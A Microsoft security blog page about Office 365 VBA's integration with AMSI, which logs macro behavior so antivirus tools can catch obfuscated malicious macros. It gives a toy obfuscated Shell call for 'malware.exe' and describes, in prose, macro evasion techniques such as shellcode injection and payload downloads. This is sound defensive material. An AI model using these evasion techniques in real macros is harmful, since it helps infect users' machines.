  • Managing devices with Microsoft Intunewhats new (BRK3036). Learn how Intune raises the bar once again for Android, Apple, and Windows device management, and hear more about the exciting new features and new use-cases announced at Ignite.
  • Elevate the security for all your cloud apps and services with the Microsoft Cloud App Security (CASB) solution (BRK2158). Gain visibility into your cloud apps and services with sophisticated analytics to identify and combat cyberthreats, and control how your ubiquitous data travels.

And one other exciting note: To see our solutions in action and gain access to a 6-month free trial of our EMS E5 solution, be sure to stop by the Microsoft Showcase for in-depth product demos and discussions with security experts.

For more Ignite news and updates, check back to our Secure Blog as we continue to highlight specific sessions and topics throughout the week.

The post Get deeper into security at Microsoft Ignite 2018 appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Office VBA + AMSI: Parting the veil on malicious macros

As part of our continued efforts to tackle entire classes of threats, Office 365 client applications now integrate with Antimalware Scan Interface (AMSI), enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior.

Macro-based threats have always been a prevalent entry point for malware, but we have observed a resurgence in recent years. Continuous improvements in platform and application security have led to the decline of software exploits, and attackers have found a viable alternative infection vector in social engineering attacks that abuse functionalities like VBA macros. Microsoft, along with the rest of the industry, observed attackers transition from exploits to using malicious macros to infect endpoints. Malicious macros have since showed up in commodity malware campaigns, targeted attacks, and in red-team activities.
Figure 1. Prevalence of the exploit vs macro attack vector observed via Windows Defender ATP telemetry

To counter this threat, we invested in building better detection mechanisms that expose macro behavior through runtime instrumentation within our threat protection solutions in the cloud. Were bringing this instrumentation directly into Office 365 client applications. More importantly, were exposing this capability through AMSI, an open interface, making it accessible to any antivirus solution.

Obfuscation and other forms of detection evasion

Macros are popular among attackers because of the rich capabilities that the VBA runtime exposes and the privileged context in which macros execute. Notably, as with all scripting languages, attackers have another advantage: they can hide malicious code through obfuscation.

To evade detection, malware needs to hide intent. The most common way that attackers do this is through code obfuscation. Macro source codes are easy to obfuscate, and a plethora of free tools are available for attackers to automatically do this. This results in polymorphic malware, with evolving obfuscation patterns and multiple obfuscated variants of the same malicious macro.

Theres more: malicious code can be taken out of the macro source and hidden in other document components like text labels, forms, Excel cells, and others. Or why hide at all? A small piece of malicious code can be embedded somewhere in a huge legitimate source and keep a low profile.

How can antivirus and other security solutions cope? Today, antivirus solutions can extract and scan the obfuscated macro source code from an Office document. How can the macros intent be exposed? What if security solutions can observe a macros behavior at runtime and gain visibility into system interactions? Enter Office and AMSI integration.

AMSI on Windows 10

If AMSI rings a bell, its because we talked about how PowerShell adopted AMSI in a blog post when AMSI was introduced back in 2015.

Antimalware Scan Interface (AMSI) is an open interface available on Windows 10 for applications to request, at runtime, a synchronous scan of a memory buffer by an installed antivirus or security solution. Any application can interface with AMSI and request a scan for any data that may be untrusted or suspicious.

Any antivirus can become an AMSI provider and inspect data sent by applications via the AMSI interface. If the content submitted for scan is detected as malicious, the requesting application can take action to deal with the threat and ensure the safety of the device. To learn more, refer to the AMSI documentation.

AMSI also integrates with the JavaScript, VBScript, and PowerShell scripting engines. Over the years, we have been steadily increasing our investments in providing security solutions with deeper visibility into script-based threats. Insights seen via AMSI is consumed by our own security products. The new Office and AMSI integration is yet another addition to the arsenal of protection against script-based malware. Windows Defender Advanced Threat Protection (Windows Defender ATP) leverages AMSI and machine learning to combat script-based threats that live off the land (read our previous blog post to learn more).

Office VBA integration with AMSI

The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection.

Figure 2. Runtime scanning of macros via AMSI

Logging macro behavior

The VBA language offers macros a rich set of functions that can be used to interface with the operating system to run commands, access the file system, etc. Additionally, it allows the ability to issue direct calls to COM methods and Win32 APIs. The VBA scripting engine handles calls from macro code to COM and APIs via internal interfaces that implement the transition between the caller and the callee. These interfaces are instrumented such that the behavior of a macro is trapped and all relevant information, including the function name and its parameters, are logged in a circular buffer.

This monitoring is not tied to specific functions; its generic and works on any COM method or Win32 API. The logged calls can come in two formats:

  • <COM_Object>.<COM_Method>(Parameter 1, , Parameter n);
  • <API_or_function_Name>(Parameter 1, , Parameter n);

Invoked functions, methods, and APIs need to receive the parameters in the clear (plaintext) in order to work; thus, this behavioral instrumentation is not affected by obfuscation. This instrumentation thus reveals a weak spot for macro codes; the antivirus now has visibility on relevant activity of the macro in the clear.

To illustrate, consider the following string obfuscation in a shell command:

Shell(ma+l+ wa+ r + e.e + xe)

With the Office VBA and AMSI integration, this is logged like so:

Shell(malware.exe);

Triggering on suspicious behavior

When a potentially high-risk function or method (a trigger; for example, CreateProcess or ShellExecute) is invoked, Office halts the execution of the macro and requests a scan of the macro behavior logged up to that moment, via the AMSI interface. The AMSI provider (e.g., antivirus software) is invoked synchronously and returns a verdict indicating whether or not the observed behavior is malicious.

The list of high-risk functions or triggers are meant to cover actions at various stages of an attack chain (e.g., payload download, persistence, execution, etc.) and are selected based on their prevalence among malicious and benign macros. The behavior log sent over AMSI can include information like suspicious URLs from which malicious data was downloaded, suspicious file names known to be associated with malware, and others. This data is valuable in determining if the macro is malicious, as well as in the creation of detection indicators all without any influence from obfuscation.

Stopping malicious macros upon detection

If behavior is assessed malicious, macro execution is stopped. The user is notified by the Office application, and the application session is shut down to avoid any further damage. This can stop an attack in its tracks, protecting the device and user.

Figure 3. Malicious macro notification

Case study 1: Heavily obfuscated macro code

(SHA-256: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd)

To illustrate how the Office VBA and AMSI integration can expose malicious macro code, lets look at a recent social engineering attack that uses macro-based malware. The initial vector is a Word document with instructions in the Chinese language to Enable content.

Figure 4: The malicious document instructs to enable the content

If the recipient falls for the lure and enables content, the malicious macro code runs and launches a command to download the payload from a command-and-control server controlled by the attacker. The payload, an installer file, is then run.

The macro code is heavily obfuscated:

Figure 5: Obfuscated macro

However, behavior monitoring is not hindered by obfuscation. It produces the following log, which it passes to AMSI for scanning by antivirus:

Figure 6: De-obfuscated behavior log

The action carried out by the macro code is logged, clearly exposing malicious actions that antivirus solutions can detect much more easily than if the code was obfuscated.

Case study 2: Macro threat that lives off the land

(SHA-256: 7952a9da1001be95eb63bc39647bacc66ab7029d8ee0b71ede62ac44973abf79)

The following is an example of macro malware that lives off the land, which means that it stays away from the disk and uses common tools to run code directly in memory. In this case, it uses shellcode and dynamic pages. Like the previous example, this attack uses social engineering to get users to click Enable Content and run the macro code, but this one uses instructions in the Spanish language in Excel.

Figure 7. Malicious Excel file with instructions to enable content

When run, the macro code dynamically allocates virtual memory, writes shellcode to the allocated location, and uses a system callback to transfer execution control. The malicious shellcode then achieves fileless persistence, being memory-resident without a file.

Figure 8. Macro code utilizing Win32 APIs to launch embedded shellcode

When the shellcode gets execution control, it launches a PowerShell command to download additional payload from a command-and-control server controlled by the attacker.

Figure 9. PowerShell command that downloads payload

Even if the macro code uses fileless code execution technique using shellcode, its behavior is exposed to antivirus solutions via the AMSI interface. Sample log is shown below:

Figure 10. De-obfuscated behavior log

With the AMSI scan integration in both Office VBA and PowerShell, security solutions like Windows Defender ATP can gain clear visibility into malicious behavior at multiple levels and successfully block attacks.

Windows Defender ATP: Force multiplier and protection for down-level platforms

In addition to protecting users running Office 365 applications on Windows 10, detections via AMSI allow modern endpoint protection platforms like Windows Defender ATP to extend protection to customers via the cloud.

Figure 11. Simplified diagram showing how AMSI detections in a few machines are extended to other customers via the cloud

In Windows Defender AVs cloud-delivered antivirus protection, the Office VBA and AMSI integration enriches the signals sent to the cloud, where multiple layers of machine learning models classify and make verdicts on files. When devices encounter documents with suspicious macro code, Windows Defender AV sends metadata and other machine learning features, coupled with signals from Office AMSI, to the cloud. Verdicts by machine learning translate to real-time protection for the rest of Windows Defender AV customers with cloud protection enabled.

This protection is also delivered to the rest of Microsoft 365 customers. Through the Microsoft Intelligent Security Graph, security signals are shared across components of Microsoft 365 threat protection. For example, in the case of macro malware, detections of malicious macro-laced documents by Windows Defender AV are shared with Office 365 ATP, which blocks emails carrying the document, stopping attacks before the documents land in users mailboxes.

Figure 12. The Office and AMSI integration enriches the orchestration of protection across Microsoft 365

Within a few weeks after the release of this new instrumentation in Office VBA and the adoption by Windows Defender ATP, we saw this multiplier effect, with signals from a few hundred devices protecting several tens of thousands of devices. Because Office AMSI feature exposes behaviors of the macro irrespective of content, language, or obfuscation, signals from one part of the world can translate to protection for the rest of the globe this is powerful.

Availability

AMSI integration is now available and turned on by default on the Monthly Channel for all Office 365 client applications that have the ability to run VBA macros including Word, Excel, PowerPoint, and Outlook.

In its default configuration, macros are scanned at runtime via AMSI except in the following scenarios:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from trusted locations
  • Documents that are trusted documents
  • Documents that contain VBA that is digitally signed by a trusted publisher

Office 365 applications also expose a new policy control for administrators to configure if and when macros are scanned at runtime via AMSI:

Group Policy setting name Macro Runtime Scan Scope
Path User Configuration > Administrative templates > Microsoft Office 2016 > Security Settings
Description

This policy setting specifies for which documents the VBA Runtime Scan feature is enabled.

Disable for all documents: If the feature is disabled for all documents, no runtime scanning of enabled macros will be performed.

Enable for low trust documents: If the feature is enabled for low trust documents, the feature will be enabled for all documents for which macros are enabled except:

  • Documents opened while macro security settings are set to “Enable All Macros”
  • Documents opened from a Trusted Location
  • Documents that are Trusted Documents
  • Documents that contain VBA that is digitally signed by a Trusted Publisher

Enable for all documents: If the feature is enabled for all documents, then the above class of documents are not excluded from the behavior.

This protocol allows the VBA runtime to report to the Anti-Virus system certain high-risk code behaviors it is about to execute and allows the Anti-Virus to report back to the process if the sequence of observed behaviors indicates likely malicious activity so the Office application can take appropriate action.

When this feature is enabled, affected VBA projects’ runtime performance may be reduced.

Conclusion: Exposing hidden malicious intent

Macro-based malware continuously evolves and poses challenges in detection using techniques like sandbox evasion and code obfuscation. Antimalware Scan Interface (AMSI)s integration with Office 365 applications enable runtime scanning of macros, exposing malicious intent even with heavy obfuscation. This latest improvement to Office 365 allows modern endpoint security platforms like Windows Defender ATP to defeat macro-based threats.

Code instrumentation and runtime monitoring are powerful tools for threat protection. Combined with runtime scanning via AMSI, they enable antivirus and other security solutions to have greater visibility into the runtime behavior of a macro execution session at a very granular level, while also bypassing code obfuscation. This enables antivirus solutions to (1) detect a wide range of mutated or obfuscated malware that exhibit the same behavior using a smaller but more efficient set of detection algorithms, and (2) impose more granular restrictions on what macros are allowed to do at runtime.

Moreover, AMSI protection is not limited to macros. Other scripting engines like JavaScript, VBScript, and PowerShell also implement a form of code instrumentation and interface with AMSI. Attacks with multiple stages that use different scripts will be under scrutiny by AMSI at each step, exposing all behaviors and enabling detection by antivirus and other solutions.

We believe this is another step forward in elevating security for Microsoft 365 customers. More importantly, AMSI and Office 365 integration enables the broader ecosystem of security solutions to better detect and protect customers from malicious attacks without disrupting day-to-day productivity.

 

 

Giulia Biagini, Microsoft Threat Intelligence Center
Sriram Iyer, Office Security
Karthik Selvaraj, Windows Defender ATP Research

 

 

 

 

The post Office VBA + AMSI: Parting the veil on malicious macros appeared first on Microsoft Secure.

Categories: cybersecurity Tags: